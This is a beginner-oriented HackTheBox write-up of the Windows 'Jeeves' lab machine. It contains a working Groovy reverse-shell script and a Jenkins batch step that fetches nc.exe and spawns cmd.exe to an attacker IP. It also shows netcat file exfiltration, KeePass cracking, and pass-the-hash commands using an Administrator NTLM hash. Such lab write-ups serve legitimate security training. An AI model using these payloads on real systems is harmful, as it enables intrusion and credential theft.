KagisoSec_
All writeups
HackTheBox: Jeeves avatar
MACHINE Windows HackTheBox 3/5

HackTheBox: Jeeves

2026-06-08 7 min read
windows jenkins groovy keepass pass-the-hash alternate-data-stream privilege-escalation
Tracks CPTS
Services jenkins

Introduction

Jeeves is a Windows machine with a few classic techniques that beginners often haven’t seen before. The path to root:

  1. Enumeration → find a Jenkins server hiding on a non-standard port
  2. Foothold → use Jenkins’ built-in script runner to get a reverse shell as kohsuke
  3. Lateral movement → find a KeePass database, crack it, extract an NTLM hash
  4. Admin shell → pass-the-hash to get a shell as Administrator
  5. Root flag → it’s hidden in an Alternate Data Stream (a sneaky Windows trick)

Key Concepts

What is Jenkins? A CI/CD automation tool that lets developers run scripts and build pipelines. If it’s left open with no login required, anyone can run commands on the server - which is exactly what happens here.

What is KeePass? A password manager that stores passwords in an encrypted .kdbx file. If you can crack the master password, you get everything inside.

What is Pass-the-Hash? On Windows, you don’t always need a plaintext password to authenticate - you can use the password’s NTLM hash directly. This is called Pass-the-Hash (PTH).

What is an Alternate Data Stream (ADS)? Windows NTFS files can secretly carry hidden data attached to them. A file called hm.txt can have a hidden stream called root.txt that doesn’t show up with a normal dir command. This is how the root flag is hidden on this box.

Enumeration

Nmap: scan all ports

nmap -p 1-65535 -T4 -A -v <TARGET>

Open ports:

PortService
80Microsoft IIS 10.0
135Windows RPC
445SMB (Windows file sharing)
50000Jetty 9.4 HTTP server ← interesting!

Port 80 is a dead end - it just shows a fake “Ask Jeeves” error page. The interesting one is port 50000, which is running a Jetty web server.

Fuzz port 50000 for hidden directories

Port 50000 returns nothing at the root. Use feroxbuster (or dirbuster) to find hidden paths:

feroxbuster -u http://<TARGET>:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Finds: http://<TARGET>:50000/askjeeves

What is feroxbuster? A tool that automatically tries thousands of directory names to find hidden pages on a web server. Think of it as knocking on every door.

Navigate to http://<TARGET>:50000/askjeeves - you’re greeted with a Jenkins dashboard, with no login required.

Foothold: Shell via Jenkins Script Console

What is the Jenkins Script Console?

Jenkins has a built-in Groovy script console at /askjeeves/script that can run arbitrary code on the server. Since there’s no authentication, we have direct code execution.

Option A: Groovy reverse shell (cleanest method)

Go to: http://<TARGET>:50000/askjeeves/script

Start your listener:

nc -nvlp 1234

Paste and run this Groovy script (replace the IP with your tun0 address):

String host = "<YOUR_IP>";
int port = 1234;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close();

Option B: Jenkins Build Step + Netcat (original method from the writeup)

If the script console isn’t available, you can use Jenkins’ New Item → Build → Execute Windows batch command feature instead.

Step 1: Host nc.exe on your machine:

# Download nc.exe for Windows first:
# https://eternallybored.org/misc/netcat/
python3 -m http.server 80

Step 2: Start your listener:

nc -nvlp 1234

Step 3: In Jenkins, go to New Item → name it anything → Freestyle projectOK. Scroll to BuildAdd build stepExecute Windows batch command. Paste:

powershell wget "http://<YOUR_IP>/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe <YOUR_IP> 1234

Click Save, then Build Now.

You get a shell as jeeves\kohsuke.

C:\Users\kohsuke\Documents> whoami
jeeves\kohsuke

Find the KeePass Database

Browse around kohsuke’s files:

cd C:\Users\kohsuke
dir /s /b

You’ll find: C:\Users\kohsuke\Documents\CEH.kdbx

What is a .kdbx file? It’s a KeePass password database. It’s encrypted, but if you crack the master password, you get all the stored passwords inside.

Transfer the file to your machine

On your machine - listen for incoming file:

nc -lp 1235 > jeeves.kdbx

On the target - send the file:

nc.exe -w 3 <YOUR_IP> 1235 < CEH.kdbx

-w 3 means “close the connection after 3 seconds of inactivity” - this stops the transfer hanging.

Crack the KeePass Database

Extract the hash

keepass2john jeeves.kdbx > jeeves.hash

What does this do? KeePass protects the database with a master password. keepass2john pulls out the encrypted portion in a format that John the Ripper can crack.

Crack it

john jeeves.hash --wordlist=/usr/share/wordlists/rockyou.txt

Password: moonshine1

Open the database

Install KeePass on your machine, open jeeves.kdbx, and enter moonshine1. You’ll see several entries. The only one that matters is “Backup stuff”:

Username: ?
Password: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Wait - that’s not a normal password! That’s an NTLM hash. The format is LM_hash:NT_hash. The LM part (aad3b435...) is a dummy value (Windows stopped using LM hashes years ago). The important part is the NT hash after the colon: e0fb1fb85756c24235ff238cbe81fe00. This is the Administrator’s password hash.

Pass-the-Hash → Shell as Administrator

What is Pass-the-Hash?

When Windows authenticates users over the network (SMB, WinRM, etc.), it sends an NTLM hash - not the plaintext password. So if you have the hash, you can authenticate without ever knowing the actual password. This is a Pass-the-Hash (PTH) attack.

Get a shell

pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //<TARGET> cmd

Breaking this down:

  • pth-winexe - a tool that uses PTH to run a command remotely via SMB
  • -U jeeves/Administrator%<LM>:<NT> - domain\user + the hash (LM:NT format)
  • //<TARGET> cmd - target IP, run cmd.exe

You get a shell as Administrator:

C:\Windows\system32> whoami
jeeves\administrator

Alternative using impacket (more common today):

impacket-psexec Administrator@<TARGET> -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Root Flag: Hidden in an Alternate Data Stream

You’re Administrator, but where’s root.txt? On the Desktop you’ll find hm.txt, but it’s empty:

C:\Users\Administrator\Desktop> more hm.txt
The flag is elsewhere.  Look deeper.

Find the hidden stream

dir /R

Output:

11/03/2017  09:58 PM                 0 hm.txt
                                    34 hm.txt:root.txt:$DATA

That hm.txt:root.txt:$DATA line reveals a hidden Alternate Data Stream called root.txt attached to hm.txt.

What is an Alternate Data Stream? NTFS (the Windows file system) lets files carry hidden extra data attached to them. The file looks empty normally, but there’s secret content hidden in a named “stream”. Regular dir hides them - dir /R shows them.

Read the hidden stream

powershell Get-Content -Path "hm.txt" -Stream "root.txt"

You get the root flag.

Summary

nmap → port 50000 (Jetty)

feroxbuster → /askjeeves → Jenkins (no login)

Jenkins Script Console → Groovy reverse shell → shell as kohsuke

C:\Users\kohsuke\Documents\CEH.kdbx → transfer to attacker

keepass2john + john → master password: moonshine1

KeePass "Backup stuff" entry → NTLM hash: e0fb1fb85756c24235ff238cbe81fe00

pth-winexe / psexec → Pass-the-Hash → shell as Administrator

dir /R on Desktop → hm.txt:root.txt:$DATA (Alternate Data Stream)

Get-Content -Stream "root.txt" → root flag

Tools Used

ToolWhat it doesHow to get it
feroxbusterFast directory/file fuzzersudo apt install feroxbuster
nc.exe (Windows)Netcat for Windows - reverse shellseternallybored.org
keepass2johnExtracts crackable hash from .kdbx filesBuilt into Kali (john suite)
johnPassword crackersudo apt install john
KeePassOpens .kdbx password databasessudo apt install keepass2
pth-winexePass-the-Hash remote shell via SMBBuilt into Kali
impacket-psexecModern PTH alternativepip install impacket
CPTS track 8 / 16

Related writeups

MACHINE Windows

HackTheBox: Administrator

A Windows DC compromised by chaining ACL misconfigurations: from Olivia, BloodHound maps GenericAll and ForceChangePassword edges to Michael and Benjamin, an FTP-hosted Password Safe backup cracks open, a password spray lands Emily over WinRM, then targeted Kerberoasting of Ethan and DCSync rights dump the Administrator hash.

#windows#active-directory#bloodhound
Read
MACHINE Windows

HackTheBox: Redelegate

A Windows DC: anonymous FTP exposes a KeePass vault cracked to a season password, MSSQL RID brute-forcing enumerates users, a password spray lands Marie.Curie, ForceChangePassword reaches Helen.Frost, and SeEnableDelegationPrivilege plus GenericAll over FS01$ set up constrained delegation (S4U2Proxy) to impersonate the DC and DCSync the Administrator hash.

#windows#active-directory#keepass
Read
MACHINE Windows

HackTheBox: Media

A Windows XAMPP box: a job-application upload form is weaponised with a malicious Windows Media Player file to capture enox's NTLMv2 hash via Responder, then an NTFS junction redirects an upload into the Apache web root for a webshell, and SeTcbPrivilege adds enox to Administrators.

#windows#xampp#file-upload
Read